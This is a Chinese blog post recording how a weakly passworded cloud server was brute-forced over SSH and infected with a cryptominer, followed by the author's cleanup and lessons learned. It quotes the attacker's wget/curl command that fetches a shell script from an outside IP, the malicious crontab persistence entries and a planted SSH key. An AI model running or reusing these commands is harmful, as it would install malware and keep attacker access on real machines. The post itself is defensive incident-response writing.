记录一次云主机被攻击挂恶意代码挖矿的事件
2020-03-19 18:49
1011 查看
由于ECS使用了有规律的弱密码被SSH暴力破解(非22端口)
阿里云提示被入侵且执行了恶意代码,安全中心可处理。
相关资料: https://bbs.pediy.com/thread-251753.htm
https://zhuanlan.zhihu.com/p/111351235
但至第二天凌晨时,依旧报警。
父进程路径:/usr/bin/perl 父进程命令行:rsync 父进程id:12354 进程id:12355 用户名:root URL链接:http://45.55.129.23/tddwrt7s.sh 进程路径:/usr/bin/bash 命令行参数:sh -c wget -q http://45.55.129.23/tddwrt7s.sh || curl -s -O -f http://45.55.129.23/tddwrt7s.sh 2>&1 3>&1 与该URL有关联的漏洞:None 事件说明:云盾检测到您的服务器正在尝试访问一个可疑恶意下载源,可能是黑客通过指令从远程服务器下载恶意文件,危害服务器安全。如果该指令不是您自己运行,请及时排查入侵原因,例如查看本机的计划任务、发起对外连接的父子进程。 解决方案:请及时排查告警中提示的恶意URL,以及所下载的目录下的恶意文件,并及时清理已运行的恶意进程。如果该指令是您自己主动执行的,您可以在控制台点击标记为误报。 ------------------------------------ 后排查rsync进程目录下有可疑目录,进行了清除。 lrwxrwxrwx 1 root root 0 Mar 19 01:36 cwd -> /dev/shm/.tddddddddd 继续排查了定时计划 [root@izbp168lretu4toy79p12kz ~]# crontab -l* */2 * * * /root/.bashtemprc/a/upd>/dev/null 2>&1
@reboot /root/.bashtemprc/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.bashtemprc/b/sync>/dev/null 2>&1
@reboot /root/.bashtemprc/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X19-unix/.rsync/c/aptitude>/dev/null 2>&1 依旧存在可疑目录,删除 后续发现在/root/.ssh目录中中被植入了黑客的公钥文件authorized_keys, 可以被免密码登录SSH了。。。 -------------------- 吸取些教训: 1.切不可用有规律的密码 2.定期检查系统定时任务是否有可疑的任务 3.定期检查/root/.ssh是否被替换了可疑的公钥 (window.slotbydup = window.slotbydup || []).push({ id: "u5931046", container: "_eejbtpvkppn", async: true });
相关文章推荐
- 记录一次网站邮箱(STMP)被恶意伪造事件
- 记录Redis的一次攻击事件
- 记录一次阿里云服务器被挖矿木马攻击后的处理
- 一次应对PowerShell+WMI挖矿攻击的记录 推荐
- 记录一次攻击事件(redis 未授权漏洞利用直接登录服务器) 推荐
- 记录一次攻击事件(redis 未授权漏洞利用直接登录服务器)v
- 记录一次Mysql死锁排查事件
- 记录一次由Redis漏洞引起的服务器遭遇入侵事件
- 记录一次有关于实现新闻下一篇功能的代码优化
- 对现有的所能找到的DDOS代码(攻击模块)做出一次分析----自定义攻击篇
- 记录一次操作git 的愚蠢行为(本地代码只 git add 过,没有 commit ,push 过,然后版本回退 导致本地代码丢失)
- 【Java】记录一次代码优化
- levenblog一次被CC攻击的分析以及应对攻击记录
- 对现有的所能找到的DDOS代码(攻击模块)做出一次分析----CC篇
- 记一次服务器被恶意攻击的情况
- 记录一次站点被攻击,1024啊,兄弟都不给点儿面子?
- 新的加密挖矿恶意软件攻击Linux机器,杀死其他挖矿软件和反恶意软件
- 【linux】记录一次系统被攻击的处理过程
- 游戏安全资讯精选 2018年第八期:3975款游戏被查处,游戏圈重击;Memcached被利用UDP反射攻击漏洞预警;VentureBeat称区块链或可定位和消除恶意可执行代码的安全问题
- 记录一次解决kworkerds挖矿木马的过程